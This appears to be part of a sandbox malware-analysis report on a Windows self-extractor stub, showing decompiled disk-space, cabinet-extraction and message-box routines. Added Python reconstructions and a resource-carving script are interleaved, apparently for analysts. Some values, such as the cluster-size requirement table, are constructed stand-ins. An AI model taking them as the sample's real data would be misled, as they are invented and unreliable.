			 *_t101 = 0; // NUL-terminate the copied prefix
			_t112 = 0x200;
			_t102 = _v812;
			_t78 = 0;
			_t118 = 8;
			while(1) { // find n in 0..7 with 0x200 << n == cluster size
				__eflags = _t102 - _t112;
				if(_t102 == _t112) {
					break;
				}
				_t112 = _t112 + _t112;
				_t78 = _t78 + 1;
				__eflags = _t78 - _t118;
				if(_t78 < _t118) {
					continue;
				}
				break;
			}
			__eflags = _t78 - _t118;
			if(_t78 != _t118) { // a cluster-size index was found
				__eflags =  *0x399a34 & 0x00000008;
				if(( *0x399a34 & 0x00000008) == 0) { // bit 3 clear: no compressed-volume adjustment
					L20:
					_t103 =  *0x399a38; // 0x0
					_t110 =  *((intOrPtr*)(0x3989e0 + (_t78 & 0x0000ffff) * 4)); // per-cluster-size requirement from the table at 0x3989e0
					L21:
					__eflags = (_v804 & 0x00000003) - 3; // _v804 & 3 selects which requirement is compared against the free space
					if((_v804 & 0x00000003) != 3) {
						__eflags = _v804 & 0x00000001;
						if((_v804 & 0x00000001) == 0) {
							__eflags = _t103 - _t116;
						} else {
							__eflags = _t110 - _t116;
						}
					} else {
						__eflags = _t103 + _t110 - _t116;
					}
					if(__eflags <= 0) { // requirement <= free KiB: enough space
						 *0x399124 = 0;
						_t66 = 1;
					} else {
						_t66 = E0039268B(_a4, _t110, _t103,  &_v16);
					}
					goto L32;
				}
				__eflags = _v816 & 0x00008000; // 0x8000 = FILE_VOLUME_IS_COMPRESSED
				if((_v816 & 0x00008000) == 0) {
					goto L20;
				}
				_t105 =  *0x399a38; // 0x0
				_t110 =  *((intOrPtr*)(0x3989e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3989e0 + (_t78 & 0x0000ffff) * 4)); // requirement doubled on a compressed volume
				_t103 = (_t105 >> 2) +  *0x399a38; // extra term scaled by 1.25
				goto L21;
			}
			_t110 = 0x4c5; // cluster size is not 0x200 << n for n in 0..7: message 0x4c5
			E003944B9(0, 0x4c5, 0, 0, 0x10, 0);
			goto L31;
		}
		memset( &_v788, 0, 0x200); // GetVolumeInformationA failed: message 0x4f9 with the system error text
		 *0x399124 = E00396285();
		FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
		_t110 = 0x4f9;
		goto L30;
	} else {
		_t110 = 0x4bc; // earlier failure (outside this fragment): message 0x4bc
		E003944B9(0, 0x4bc, 0, 0, 0x10, 0);
		 *0x399124 = E00396285();
		_t66 = 0;
		L33:
		return E00396CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
	}
}
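A readable reconstruction of the decision logic in the decompiled fragment above, added here as an example; it is not code from the sample or from the Joe Sandbox report. It assumes that _v792 * _v796 is the cluster size in bytes and _v800 the free-cluster count (GetDiskFreeSpace-style values, not visible in the fragment), that the 8-entry table at 0x3989e0 holds per-cluster-size requirements in KiB (its contents are not in the report, so the values below are constructed), that *0x399a38 is an extra KiB requirement (0 in the trace) and that *0x399a34 bit 3 and the low two bits of _v804 have the roles visible in the branches. The message IDs 0x4b0, 0x4c5, 0x4f9 and 0x4bc are the ones passed to E003944B9 in the listing.

```python
"""Reconstruction of the disk-space check from the decompiled fragment (added
example, not the sample's own code). Slot meanings marked 'assumed' are not
visible in the fragment."""

FILE_VOLUME_IS_COMPRESSED = 0x00008000   # lpFileSystemFlags bit tested as _v816 & 0x8000
FORMAT_MESSAGE_FROM_SYSTEM = 0x1000      # FormatMessageA flags used on both error paths

# String IDs handed to E003944B9 on the failure paths (from the listing).
MSG_NO_FREE_SPACE = 0x4b0       # MulDiv(...) returned 0
MSG_BAD_CLUSTER_SIZE = 0x4c5    # cluster size is not 0x200 << n for n in 0..7
MSG_VOLUME_INFO_FAILED = 0x4f9  # GetVolumeInformationA returned 0
MSG_DISK_QUERY_FAILED = 0x4bc   # outer else branch; its cause lies outside the fragment

# Constructed stand-in for the table at 0x3989e0 (real values are not in the report).
REQUIRED_KIB_BY_CLUSTER_INDEX = [1024, 1040, 1072, 1136, 1264, 1520, 2032, 3056]


def muldiv(number, numerator, denominator):
    """MulDiv semantics for non-negative operands: 64-bit product, rounded to nearest."""
    return (number * numerator + denominator // 2) // denominator


def cluster_index(cluster_bytes):
    """The doubling loop: n with 0x200 << n == cluster_bytes, or None once the
    counter reaches 8 (sizes above 64 KiB, or not a power of two)."""
    size, n = 0x200, 0
    while size != cluster_bytes:
        size += size
        n += 1
        if n >= 8:
            return None
    return n


def drive_prefix(path):
    """The copy loop into _v16: at most two bytes (the counter starts at 6 and the
    loop exits when it reaches 4), stopping early at NUL, then NUL-terminated."""
    out = ""
    for ch in path[:2]:
        if ch == "\0":
            break
        out += ch
    return out


def disk_space_check(bytes_per_sector, sectors_per_cluster, free_clusters,
                     volume_info_ok, fs_flags, mode_bits, global_flags,
                     extra_kib=0, table=REQUIRED_KIB_BY_CLUSTER_INDEX):
    """Returns (enough_space, message_id). message_id is None on success and on
    the 'not enough space' outcome, where the listing calls E0039268B instead
    of the message routine."""
    cluster_bytes = bytes_per_sector * sectors_per_cluster   # _v812 (assumed meaning)
    free_kib = muldiv(cluster_bytes, free_clusters, 0x400)    # _t116
    if free_kib == 0:
        return False, MSG_NO_FREE_SPACE                       # goto L29
    if not volume_info_ok:
        return False, MSG_VOLUME_INFO_FAILED                  # 0x4f9 path
    n = cluster_index(cluster_bytes)
    if n is None:
        return False, MSG_BAD_CLUSTER_SIZE                    # _t78 == 8
    required = table[n]          # _t110
    extra = extra_kib            # _t103, *0x399a38 (assumed meaning)
    if (global_flags & 8) and (fs_flags & FILE_VOLUME_IS_COMPRESSED):
        required = 2 * required          # table entry added to itself
        extra = (extra >> 2) + extra     # 1.25x
    if (mode_bits & 3) == 3:
        needed = extra + required
    elif mode_bits & 1:
        needed = required
    else:
        needed = extra
    return needed <= free_kib, None      # __eflags <= 0 means enough space
```

The check is ordered exactly as in the listing: a zero free-space result is reported before the volume query, and a cluster size outside 512 bytes to 64 KiB is rejected even though the doubling loop would have matched 128 KiB on its eighth step.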
Instruction addresses from the report's annotation column (one entry per decompiled line): 0x0039597d 0x00395988 0x0039598f 0x0039599a 0x003959a6 0x003959a8 0x003959af 0x003959b9 0x003959dd 0x003959e4 0x003959f1 0x003959fe 0x00395a0b 0x00395a13 0x00395a19 0x00395a1b 0x00395ba1 0x00395baf 0x00395bbd 0x00395bd8 0x00395bde 0x00395be3 0x00395bec 0x00395bf0 0x00395bfc 0x00395c02 0x00395c02 0x00395c02 0x00395c04 0x00395c04 0x00000000 0x00395c04 0x00395a27 0x00395a3a 0x00395a46 0x00395a48 0x00395a4a 0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395a64
                                                                                                                                                                                                    0x00395a6a
                                                                                                                                                                                                    0x00395a6c
                                                                                                                                                                                                    0x00395abc
                                                                                                                                                                                                    0x00395ac2
                                                                                                                                                                                                    0x00395ac9
                                                                                                                                                                                                    0x00395aca
                                                                                                                                                                                                    0x00395aca
                                                                                                                                                                                                    0x00395acc
                                                                                                                                                                                                    0x00395acc
                                                                                                                                                                                                    0x00395acf
                                                                                                                                                                                                    0x00395ad1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ad3
                                                                                                                                                                                                    0x00395ad6
                                                                                                                                                                                                    0x00395ad8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ada
                                                                                                                                                                                                    0x00395adc
                                                                                                                                                                                                    0x00395add
                                                                                                                                                                                                    0x00395add
                                                                                                                                                                                                    0x00395ae0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395ae0
                                                                                                                                                                                                    0x00395ae2
                                                                                                                                                                                                    0x00395ae4
                                                                                                                                                                                                    0x00395ae6
                                                                                                                                                                                                    0x00395ae6
                                                                                                                                                                                                    0x00395ae6
                                                                                                                                                                                                    0x00395ae9
                                                                                                                                                                                                    0x00395aeb
                                                                                                                                                                                                    0x00395af0
                                                                                                                                                                                                    0x00395af6
                                                                                                                                                                                                    0x00395af8
                                                                                                                                                                                                    0x00395af9
                                                                                                                                                                                                    0x00395af9
                                                                                                                                                                                                    0x00395afb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395afd
                                                                                                                                                                                                    0x00395aff
                                                                                                                                                                                                    0x00395b00
                                                                                                                                                                                                    0x00395b03
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b03
                                                                                                                                                                                                    0x00395b05
                                                                                                                                                                                                    0x00395b08
                                                                                                                                                                                                    0x00395b20
                                                                                                                                                                                                    0x00395b27
                                                                                                                                                                                                    0x00395b52
                                                                                                                                                                                                    0x00395b52
                                                                                                                                                                                                    0x00395b5b
                                                                                                                                                                                                    0x00395b62
                                                                                                                                                                                                    0x00395b6b
                                                                                                                                                                                                    0x00395b6d
                                                                                                                                                                                                    0x00395b76
                                                                                                                                                                                                    0x00395b7d
                                                                                                                                                                                                    0x00395b83
                                                                                                                                                                                                    0x00395b7f
                                                                                                                                                                                                    0x00395b7f
                                                                                                                                                                                                    0x00395b7f
                                                                                                                                                                                                    0x00395b6f
                                                                                                                                                                                                    0x00395b72
                                                                                                                                                                                                    0x00395b72
                                                                                                                                                                                                    0x00395b85
                                                                                                                                                                                                    0x00395b98
                                                                                                                                                                                                    0x00395b9e
                                                                                                                                                                                                    0x00395b87
                                                                                                                                                                                                    0x00395b8f
                                                                                                                                                                                                    0x00395b8f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b85
                                                                                                                                                                                                    0x00395b29
                                                                                                                                                                                                    0x00395b33
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b35
                                                                                                                                                                                                    0x00395b48
                                                                                                                                                                                                    0x00395b4a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b4a
                                                                                                                                                                                                    0x00395b0f
                                                                                                                                                                                                    0x00395b16
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00395b16
                                                                                                                                                                                                    0x00395a7c
                                                                                                                                                                                                    0x00395a8a
                                                                                                                                                                                                    0x00395aa5
                                                                                                                                                                                                    0x00395aab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003959bb
                                                                                                                                                                                                    0x003959c0
                                                                                                                                                                                                    0x003959c7
                                                                                                                                                                                                    0x003959d1
                                                                                                                                                                                                    0x003959d6
                                                                                                                                                                                                    0x00395c05
                                                                                                                                                                                                    0x00395c14
                                                                                                                                                                                                    0x00395c14

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003959A8
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 003959AF
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00395A13
                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00395A40
                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00395A64
                                                                                                                                                                                                    • memset.MSVCRT ref: 00395A7C
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00395A98
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00395AA5
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00395BFC
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                      • Part of subcall function 00396285: GetLastError.KERNEL32(00395BBC), ref: 00396285
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
• String ID:
• API String ID: 4237285672-0
• Opcode ID: 220bdd677d254d0adbe1cfd2007320b14a42577e0867d11eb3f8eaf1786ccd9b
• Instruction ID: 3fca321c427c06ef9857ecac39e57e0938dcd553f770b286e1713b6b4214438a
• Opcode Fuzzy Hash: 220bdd677d254d0adbe1cfd2007320b14a42577e0867d11eb3f8eaf1786ccd9b
• Instruction Fuzzy Hash: 0F718FB190060CAFEF279F64CC85FFA77BCEB48340F1445AAF545D6280EA319E858B64

Uniqueness Score: -1.00%

Control-flow Graph: [interactive graph omitted; entry block 394fe0-39501a calls 39468f, FindResourceA, LoadResource, LockResource]
C-Code - Quality: 77%
			// Decompiler output as emitted by the sandbox; the comments below are editor's notes.
			// Ordinal imports (__imp__#20/#22/#23) are resolved here by argument shape only,
			// which matches cabinet.dll's FDICreate/FDICopy/FDIDestroy; the report itself does
			// not name the module, so treat that as an inference.
			E00394FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				// Locate the "CABINET" resource (type 0xa = RT_RCDATA), load and lock it,
				// and cache the locked pointer in the global at 0x399140.
				_t36 = "CABINET";
				 *0x399144 = E0039468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x399140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				// If the dialog at 0x398584 exists, hide control 0x842 (SW_HIDE = 0)
				// and show control 0x841 (SW_SHOW = 5).
				_t9 =  *0x398584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x398584, 0x841), 5); // executed
				}
				_t10 = E00394EFD(0, 0); // executed
				if(_t10 != 0) {
					// Ordinal #20: seven callbacks, a cpuType value and an error-record pointer
					// (0x399148); the trailing _t33 is a decompiler artifact. Shape matches FDICreate.
					__imp__#20(E00394CA0, E00394CC0, E00394980, E00394A50, E00394AD0, E00394B60, E00394BC0, 1, 0x399148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						// Failure path: E003944B9 is called with flags 0x10 everywhere in this
						// function, consistent with an error-dialog helper (inference).
						_t29 =  *0x399148; // 0x0
						_t24 =  *0x398584; // 0x0
						E003944B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					// Ordinal #22: handle, cabinet name "*MEMCAB", path, flags, notify callback,
					// decrypt callback, user pointer = the locked resource. Shape matches FDICopy,
					// i.e. the cabinet is processed from the in-memory resource rather than a file.
					__imp__#22(_t34, "*MEMCAB", 0x391140, 0, E00394CD0, 0, 0x399140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					// Ordinal #23 on the handle: shape matches FDIDestroy.
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x398584; // 0x0
					E003944B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					// Common exit: release the locked resource and clear the cached pointer.
					_t12 =  *0x399140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x399140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x3991d8; // 0x0
						if(_t47 == 0) {
							E003944B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					// Report the result to the dialog with custom message 0xfa1 unless
					// either of the two flag bits is set.
					if(( *0x398a38 & 0x00000001) == 0 && ( *0x399a34 & 0x00000001) == 0) {
						SendMessageA( *0x398584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00394FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00395006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0039500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00395030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00395037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 0039504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00395051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00395111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00395159
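The resource calls listed above (FindResourceA with type 0x0000000A, i.e. RT_RCDATA, and the name CABINET, followed by LoadResource and LockResource) are how the stub locates its embedded payload at run time; together with the *MEMCAB string they are consistent with a Microsoft IExpress/wextract-style self-extractor, whose CAB payload lives in an RCDATA resource. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it performs the same lookup statically, parsing the PE headers to reach the resource directory, walking type, name and language, and carving the RT_RCDATA entry named CABINET, which it accepts only if it starts with the MSCF cabinet magic. The names find_rcdata, carve_cabinet and build_demo_pe are the example's own; the minimal PE and cabinet bytes produced by build_demo_pe() are constructed stand-ins for file.exe so the script runs offline.

```python
"""Statically carve the RT_RCDATA resource named "CABINET" that a wextract-style
stub resolves at run time with FindResourceA(NULL, "CABINET", RT_RCDATA).

Added example (stdlib only); build_demo_pe() is a constructed stand-in for file.exe.
"""
import struct

RT_RCDATA = 10                      # the 0x0000000A type argument seen in FindResourceA
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2  # index of the resource entry in the data directory


def _u16(b, o):
    return struct.unpack_from("<H", b, o)[0]


def _u32(b, o):
    return struct.unpack_from("<I", b, o)[0]


def _entry_name(rsrc, name_field):
    """Resolve a directory entry Name field: UTF-16 string (high bit set) or integer ID."""
    if name_field & 0x80000000:
        off = name_field & 0x7FFFFFFF          # offset of IMAGE_RESOURCE_DIR_STRING_U
        n = _u16(rsrc, off)
        return rsrc[off + 2: off + 2 + 2 * n].decode("utf-16-le")
    return name_field


def walk_resources(rsrc, rsrc_rva, dir_off=0, path=()):
    """Yield ((type, name, lang), data) for every leaf of a .rsrc section image.

    rsrc is the raw section; rsrc_rva its VirtualAddress, needed because
    IMAGE_RESOURCE_DATA_ENTRY.OffsetToData is an RVA, not a section offset.
    """
    named, by_id = _u16(rsrc, dir_off + 12), _u16(rsrc, dir_off + 14)
    for i in range(named + by_id):
        ent = dir_off + 16 + 8 * i
        name = _entry_name(rsrc, _u32(rsrc, ent))
        off = _u32(rsrc, ent + 4)
        if off & 0x80000000:                   # subdirectory
            if len(path) >= 2:                 # type/name/lang is the maximum depth:
                continue                       # refuse cycles in a malformed tree
            yield from walk_resources(rsrc, rsrc_rva, off & 0x7FFFFFFF, path + (name,))
        else:                                  # IMAGE_RESOURCE_DATA_ENTRY (16 bytes)
            data_rva, size = _u32(rsrc, off), _u32(rsrc, off + 4)
            start = data_rva - rsrc_rva
            yield path + (name,), rsrc[start:start + size]


def find_rcdata(rsrc, rsrc_rva, name):
    """Static equivalent of FindResourceA(hMod, name, RT_RCDATA): names compare case-insensitively."""
    for (rtype, rname, _lang), data in walk_resources(rsrc, rsrc_rva):
        if rtype == RT_RCDATA and isinstance(rname, str) and rname.upper() == name.upper():
            return data
    return None


def rsrc_section(pe):
    """Return (raw section bytes, VirtualAddress) of the section holding the resource directory."""
    pe_off = _u32(pe, 0x3C)                                   # e_lfanew
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsect, opt_size = _u16(pe, pe_off + 6), _u16(pe, pe_off + 20)
    opt = pe_off + 24
    dd = opt + (96 if _u16(pe, opt) == 0x10B else 112)       # PE32 vs PE32+ data directory
    res_rva = _u32(pe, dd + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE)
    for i in range(nsect):
        s = opt + opt_size + 40 * i
        vsize, va, rawsz, rawptr = struct.unpack_from("<IIII", pe, s + 8)
        if va <= res_rva < va + max(vsize, rawsz):
            return pe[rawptr:rawptr + rawsz], va
    raise ValueError("resource directory RVA not inside any section")


def carve_cabinet(pe):
    """Carve the CABINET payload; return None unless it carries the MS-Cabinet magic (MSCF)."""
    rsrc, va = rsrc_section(pe)
    cab = find_rcdata(rsrc, va, "CABINET")
    return cab if cab is not None and cab[:4] == b"MSCF" else None


def build_demo_rsrc(payload, rsrc_rva):
    """Constructed .rsrc image: root -> RT_RCDATA -> "CABINET" -> lang 0x409 -> payload."""
    def directory(named, by_id, entries):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, by_id) + b"".join(
            struct.pack("<II", n, o) for n, o in entries)
    root = directory(0, 1, [(RT_RCDATA, 0x80000000 | 24)])             # @0, 24 bytes
    typed = directory(1, 0, [(0x80000000 | 48, 0x80000000 | 64)])      # @24
    namestr = struct.pack("<H", 7) + "CABINET".encode("utf-16-le")     # @48, 16 bytes
    named = directory(0, 1, [(0x409, 88)])                             # @64
    dataent = struct.pack("<IIII", rsrc_rva + 104, len(payload), 0, 0)  # @88
    return root + typed + namestr + named + dataent + payload          # payload @104


def build_demo_pe(payload=b"MSCF" + b"\0" * 28 + b"constructed cab body"):
    """Minimal constructed PE32 with one .rsrc section; a stand-in for file.exe, not real data."""
    rsrc_rva, rsrc_raw = 0x2000, 0x200
    rsrc = build_demo_rsrc(payload, rsrc_rva)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE, rsrc_rva, len(rsrc))
    sect = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, len(rsrc),
                       rsrc_raw, 0, 0, 0, 0, 0x40000040)
    return (dos + b"PE\0\0" + file_hdr + bytes(opt) + sect).ljust(rsrc_raw, b"\0") + rsrc


if __name__ == "__main__":
    cab = carve_cabinet(build_demo_pe())
    print("carved %d bytes, magic %r" % (len(cab), cab[:4]))
```

To use it on the real sample, read file.exe into bytes and call carve_cabinet(); the returned bytes can be written out and expanded with any CAB tool. The MSCF check matters because the stub trusts whatever LockResource hands back, while an analyst should confirm the carved blob really is a cabinet before feeding it to a decompressor.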
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: 2f17bcc9211b1f24b41e2ef98e4622fb9ac70840d63d0fac181c4e6e7c55b34a
                                                                                                                                                                                                    • Instruction ID: 2a1e3340a4a9e7eb483006f240ef80932c958d6552fdd59c053e2649537edd02
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f17bcc9211b1f24b41e2ef98e4622fb9ac70840d63d0fac181c4e6e7c55b34a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 763139B1740702BFEF235B66AC8AF77379CB745755F05051BF901A22A1DAB68C4187A0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    control_flow_graph 406 3944b9-3944f8 407 394679-39467b 406->407 408 3944fe-394525 LoadStringA 406->408 411 39467c-39468c call 396ce0 407->411 409 394562-394568 408->409 410 394527-39452e call 39681f 408->410 412 39456b-394570 409->412 420 39453f 410->420 421 394530-39453d call 3967c9 410->421 412->412 415 394572-39457c 412->415 418 3945c9-3945cb 415->418 419 39457e-394580 415->419 424 3945cd-3945cf 418->424 425 394607-394617 LocalAlloc 418->425 422 394583-394588 419->422 426 394544-394554 MessageBoxA 420->426 421->420 421->426 422->422 429 39458a-39458c 422->429 431 3945d2-3945d7 424->431 427 39455a-39455d 425->427 428 39461d-394628 call 391680 425->428 426->427 427->411 435 39462d-39463d MessageBeep call 39681f 428->435 433 39458f-394594 429->433 431->431 434 3945d9-3945ed LocalAlloc 431->434 433->433 436 394596-3945ad LocalAlloc 433->436 434->427 437 3945f3-394605 call 39171e 434->437 444 39463f-39464c call 3967c9 435->444 445 39464e 435->445 436->427 439 3945af-3945c7 call 39171e 436->439 437->435 439->435 444->445 448 394653-394677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E003944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                    				_t34 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
